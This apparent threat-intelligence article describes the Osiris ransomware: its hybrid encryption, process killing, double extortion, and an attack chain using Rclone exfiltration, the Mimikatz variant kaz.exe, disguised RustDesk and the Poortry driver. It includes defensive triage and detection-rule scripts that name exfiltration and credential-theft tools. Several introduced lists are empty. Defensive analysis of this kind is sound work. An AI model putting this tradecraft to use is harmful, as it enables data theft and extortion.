Cybersecurity experts continue to warn organizations about the evolving nature of cybercrime. One of the most alarming developments in recent months is the emergence of Osiris, a newly identified ransomware threat that demonstrates sophisticated techniques and operational maturity. First observed in late 2025, this ransomware has already targeted major organizations and shows signs of being operated by highly experienced attackers. The appearance of Osiris ransomware is another reminder that the global ransomware ecosystem continues to evolve rapidly. Attackers constantly refine their methods, combining new malware families with proven tactics such as data exfiltration, remote access tools, and privilege escalation techniques.
Osiris is a newly discovered ransomware threat that was identified during an attack targeting a major food service franchise operator in Southeast Asia in November 2025. Security researchers investigating the incident concluded that this malware represents a completely new ransomware family.
Although the name “Osiris” may sound familiar to cybersecurity professionals, it is important to note that this ransomware is not related to the Osiris variant discovered in 2016, which was linked to the Locky ransomware family. The modern Osiris threat appears to have been developed independently and shows distinct functionality and design. At the time of analysis, little is known about the developers behind this ransomware threat.
Researchers have not confirmed whether Osiris operates as a ransomware-as-a-service (RaaS) platform or whether it is controlled by a single threat group. However, evidence suggests that the attackers deploying Osiris may have connections to previous Inc ransomware campaigns. These similarities include shared tools, tactics, and operational behaviors that hint at either collaboration or the involvement of former affiliates of existing ransomware groups.
Like many modern ransomware families, Osiris includes a wide range of malicious functions designed to maximize the damage inflicted on victims. The ransomware is capable of:
These features allow attackers to disrupt business operations while ensuring that valuable files are inaccessible unless the ransom is paid. One of the distinctive aspects of the Osiris ransomware threat is its flexibility through command-line parameters. Attackers can configure the ransomware to perform specific actions during deployment, such as specifying directories to encrypt or enabling partial or full encryption modes. For example, the ransomware supports options that allow operators to:
This level of control suggests that Osiris was developed by experienced malware authors who understand the needs of ransomware operators conducting targeted attacks.
A common strategy used by ransomware developers is to avoid encrypting certain system files that could break the operating system completely. If a system becomes unusable, victims may simply restore backups rather than paying the ransom. The Osiris ransomware threat follows this same strategy. It deliberately skips several file extensions, including:
Similarly, it avoids encrypting critical system directories such as:
By avoiding these locations, the ransomware ensures that the system remains functional enough for victims to read the ransom note and communicate with attackers. After encryption, the malware appends the “.Osiris” extension to affected files. For instance, a file named document.txt would become document.txt.Osiris. This extension serves as a clear indicator that files have been compromised by the Osiris ransomware attack.
One of the most critical components of any ransomware threat is its encryption mechanism. Osiris uses a hybrid encryption scheme that combines modern cryptographic techniques. The ransomware utilizes:
Each file encrypted by Osiris receives its own unique AES key, making decryption without the attacker’s private key extremely difficult. This approach is commonly used by advanced ransomware families because it balances speed and security. AES encryption allows rapid file processing, while ECC protects the encryption keys from recovery.
Additionally, the ransomware uses a Windows function called completionIOPort to manage asynchronous input/output requests during encryption. This allows the malware to encrypt files efficiently without causing obvious system slowdowns that might alert users.
To maximize the effectiveness of its attack, the Osiris ransomware threat actively terminates processes that might interfere with encryption. Examples of targeted processes include:
By stopping these processes, attackers ensure that important files are unlocked and accessible for encryption. In addition to processes, Osiris also stops critical services such as:
This tactic prevents victims from easily restoring files using system snapshots or backup tools.
Once encryption is complete, the ransomware drops a file named “Osiris-MESSAGE.txt.” This ransom note informs victims that their files have been encrypted and that sensitive data has been stolen. It typically includes a link to a negotiation platform where victims can communicate directly with the attackers to discuss payment.
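The two post-encryption artifacts described above (the appended ".Osiris" extension and the "Osiris-MESSAGE.txt" note) can be turned into a simple file-system triage check. The script below is an added example for this article, not code from the researchers or the malware; the sample tree it scans is constructed in a temporary directory and is hypothetical.

```python
import os
import tempfile
from pathlib import Path

OSIRIS_EXT = ".Osiris"              # extension appended to encrypted files
RANSOM_NOTE = "Osiris-MESSAGE.txt"  # note dropped after encryption


def triage_tree(root):
    """Walk a directory tree and report Osiris post-encryption indicators.

    Returns the number of renamed files, the original file names recovered by
    stripping the appended extension, per-directory counts (useful for scoping
    which shares were reached), and the directories holding ransom notes.
    """
    root = Path(root)
    encrypted, notes = [], []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = Path(dirpath) / name
            if name == RANSOM_NOTE:
                notes.append(path)
            elif name.endswith(OSIRIS_EXT):
                encrypted.append(path)
    per_dir = {}
    for p in encrypted:
        key = str(p.parent.relative_to(root))
        per_dir[key] = per_dir.get(key, 0) + 1
    return {
        "encrypted_count": len(encrypted),
        "original_names": sorted(p.name[: -len(OSIRIS_EXT)] for p in encrypted),
        "encrypted_per_dir": per_dir,
        "note_dirs": sorted(str(p.parent.relative_to(root)) for p in notes),
        "hit": bool(encrypted or notes),
    }


def build_sample_tree():
    """Constructed sample victim tree for the demo (hypothetical, not real data)."""
    root = Path(tempfile.mkdtemp(prefix="osiris_triage_"))
    (root / "docs").mkdir()
    (root / "docs" / "document.txt.Osiris").write_bytes(b"\x00" * 32)
    (root / "docs" / "report.xlsx.Osiris").write_bytes(b"\x00" * 32)
    (root / "docs" / RANSOM_NOTE).write_text("Your files have been encrypted.\n")
    (root / "Windows").mkdir()                        # system dir left untouched
    (root / "Windows" / "kernel32.dll").write_bytes(b"MZ")
    return root


if __name__ == "__main__":
    print(triage_tree(build_sample_tree()))
```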
The attackers also threaten to leak the stolen data if the ransom is not paid, a tactic commonly known as double extortion. This strategy has become a common practice in modern ransomware operations because it significantly increases pressure on victims to comply with the attackers’ ransom demands.
Understanding how Osiris ransomware spreads is essential for organizations that want to prevent similar attacks. Based on investigations, the attack chain observed in the 2025 incident involved multiple stages, beginning with data exfiltration and followed by credential theft, reconnaissance, and remote access.
One of the earliest indicators of the attack was the use of Rclone, a legitimate command-line tool commonly used for transferring files to cloud storage. In this campaign, attackers used Rclone to exfiltrate sensitive data from the victim’s network to a Wasabi cloud storage bucket. This method allows cybercriminals to move large volumes of data efficiently while blending their activity with normal network traffic. Notably, the same tactic had previously been observed in operations linked to the Inc ransomware group, suggesting potential similarities between the campaigns.
Another important tool used during the attack was Mimikatz, a well-known credential harvesting utility widely used by threat actors. In this case, attackers deployed a variant of Mimikatz named kaz.exe, which had also been seen in earlier Inc ransomware incidents. The reuse of the same filename and tool variant strengthens the theory that the operators behind the Osiris ransomware threat may have prior experience with other ransomware operations.
The attackers also relied on several legitimate administrative tools such as Netscan, Netexec, and MeshAgent. These tools are commonly used by system administrators for network management but can also be abused by attackers for malicious purposes. In this campaign, they were likely used for reconnaissance, lateral movement within the network, and maintaining persistence on compromised systems. This technique, often referred to as “living off the land,” helps attackers avoid detection because the tools themselves are not inherently malicious.
Another notable aspect of the attack was the use of a modified version of RustDesk, an open-source remote desktop application. The attackers altered the software to disguise its real purpose by configuring it to appear as “WinZip Remote Desktop” and assigning it the WinZip application icon. This type of camouflage helps the malicious tool appear legitimate to users and security systems, allowing attackers to maintain remote access without immediately raising suspicion.
These combined techniques demonstrate that the operators behind the Osiris ransomware threat relied on a carefully coordinated attack chain, leveraging both legitimate tools and modified software to infiltrate networks and prepare systems for ransomware deployment.
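The pre-encryption tool chain described above (Rclone to Wasabi, the kaz.exe Mimikatz variant, Netscan/Netexec/MeshAgent, and RustDesk disguised as "WinZip Remote Desktop") maps onto a small set of process-creation detection rules. The code below is an added example written for this article, not the researchers' or any vendor's detection logic; the events are constructed Sysmon-style records, and the Wasabi endpoint domain and the nxc.exe/meshagent.exe file names are assumptions.

```python
# Constructed Sysmon-style process-creation events (Event ID 1 fields);
# hypothetical sample data, not telemetry from the incident described above.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe", "CommandLine": "svchost.exe -k netsvcs",
     "OriginalFileName": "svchost.exe", "Description": "Host Process for Windows Services"},
    {"Image": r"C:\ProgramData\rclone.exe",
     "CommandLine": r"rclone.exe copy D:\Finance remote:bucket --s3-endpoint s3.wasabisys.com",
     "OriginalFileName": "rclone.exe", "Description": "Rclone"},
    {"Image": r"C:\Users\Public\kaz.exe", "CommandLine": "kaz.exe",
     "OriginalFileName": "mimikatz.exe", "Description": "mimikatz for Windows"},
    {"Image": r"C:\Users\Public\netscan.exe", "CommandLine": "netscan.exe",
     "OriginalFileName": "netscan.exe", "Description": "Network Scanner"},
    {"Image": r"C:\Program Files\WinZip\WinZipRD.exe", "CommandLine": "WinZipRD.exe --service",
     "OriginalFileName": "rustdesk.exe", "Description": "WinZip Remote Desktop"},
]


def _basename(event):
    return event["Image"].rsplit("\\", 1)[-1].lower()


# One rule per indicator from the Osiris attack chain. The file names
# nxc.exe and meshagent.exe are assumed binary names, not from the report.
RULES = [
    ("rclone exfiltration to Wasabi",
     lambda e: _basename(e) == "rclone.exe" and "wasabisys.com" in e["CommandLine"].lower()),
    ("kaz.exe / Mimikatz variant",
     lambda e: _basename(e) == "kaz.exe" or e["OriginalFileName"].lower() == "mimikatz.exe"),
    ("admin tool reuse (Netscan/Netexec/MeshAgent)",
     lambda e: _basename(e) in {"netscan.exe", "netexec.exe", "nxc.exe", "meshagent.exe"}),
    ("RustDesk renamed on disk",            # PE original name vs. on-disk name mismatch
     lambda e: e["OriginalFileName"].lower() == "rustdesk.exe" and _basename(e) != "rustdesk.exe"),
    ("WinZip Remote Desktop disguise",
     lambda e: "winzip remote desktop" in e["Description"].lower()),
]


def detect(events):
    """Return (rule name, image path) pairs for every event matching a rule."""
    hits = []
    for event in events:
        for name, predicate in RULES:
            if predicate(event):
                hits.append((name, event["Image"]))
    return hits


if __name__ == "__main__":
    for rule, image in detect(SAMPLE_EVENTS):
        print(f"{rule:45} {image}")
```

The renamed-RustDesk rule is the most durable of the five, since it keys on the mismatch between the PE's OriginalFileName and the name used on disk rather than on the specific "WinZip" disguise.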
One of the most sophisticated elements of the Osiris ransomware threat is the use of a malicious driver called Poortry, also known as Abyssworker. This driver played a critical role in weakening security defenses during the attack. It was deployed as part of a Bring Your Own Vulnerable Driver (BYOVD) attack, a technique increasingly used by ransomware operators to bypass modern security protections.
In BYOVD attacks, cybercriminals load vulnerable or malicious drivers onto a system to gain kernel-level access, which allows them to disable security software and bypass defensive mechanisms. Poortry is particularly unusual because it appears to be a custom driver that attackers managed to get digitally signed, which makes it more difficult for security tools to detect. Once deployed, the driver can terminate security processes and disable protective software, making it extremely valuable for ransomware operators preparing the environment for encryption.
In addition to the Poortry driver, the attackers behind the Osiris ransomware threat deployed several other tools to maintain control over the compromised network and disrupt defensive mechanisms. These tools helped them strengthen their foothold and ensure that security solutions could not easily stop the attack.
These tools allowed the attackers to terminate antivirus processes and maintain remote access to the compromised environment. Their use demonstrates that the operation was carefully planned and executed with multiple layers of attack techniques.
Although researchers have not definitively linked Osiris ransomware to a specific threat group, several indicators suggest that the attackers may have connections to previously active ransomware operators. The overlap in tactics and tools raises the possibility that experienced affiliates from other ransomware campaigns are involved. Indicators suggesting potential links include:
Additionally, the Poortry driver has previously been observed in attacks associated with the Medusa ransomware group. However, since Poortry is not exclusive to a single threat actor, its presence alone does not confirm attribution. Instead, it highlights how ransomware operators frequently share tools and techniques across the cybercriminal ecosystem.
The emergence of Osiris highlights several important trends in the evolving ransomware landscape. As cybercriminal groups continue to refine their methods, ransomware attacks are becoming increasingly complex and difficult to detect.
Modern ransomware campaigns often combine data theft, privilege escalation, and advanced encryption techniques to maximize their impact. In addition, the ransomware ecosystem is highly dynamic, with new malware families appearing frequently and often being developed by attackers who previously worked with other ransomware groups.
These attacks are rarely simple malware infections. Instead, they are usually multi-stage operations involving reconnaissance, lateral movement, and data exfiltration before encryption occurs. As a result, organizations that fail to detect early warning signs may only discover the intrusion when ransomware is finally deployed.
Given the growing sophistication of threats like Osiris ransomware, organizations must adopt a proactive and layered cybersecurity strategy. Preventing ransomware attacks requires a combination of strong technical defenses, monitoring capabilities, and employee awareness. Key defensive measures include:
In addition to these measures, organizations should maintain reliable offline backups so critical data can be restored without paying a ransom. Regular cybersecurity awareness training is also essential, as many ransomware attacks begin with phishing emails or credential compromise that provide attackers with their initial access point.
The discovery of Osiris highlights the evolving nature of modern ransomware threats. With advanced encryption, defense evasion techniques, and a complex attack chain, Osiris demonstrates the capabilities of experienced cybercriminals. As ransomware continues to grow more sophisticated, organizations must strengthen their cybersecurity defenses and stay vigilant to detect threats early and reduce the risk of serious data loss.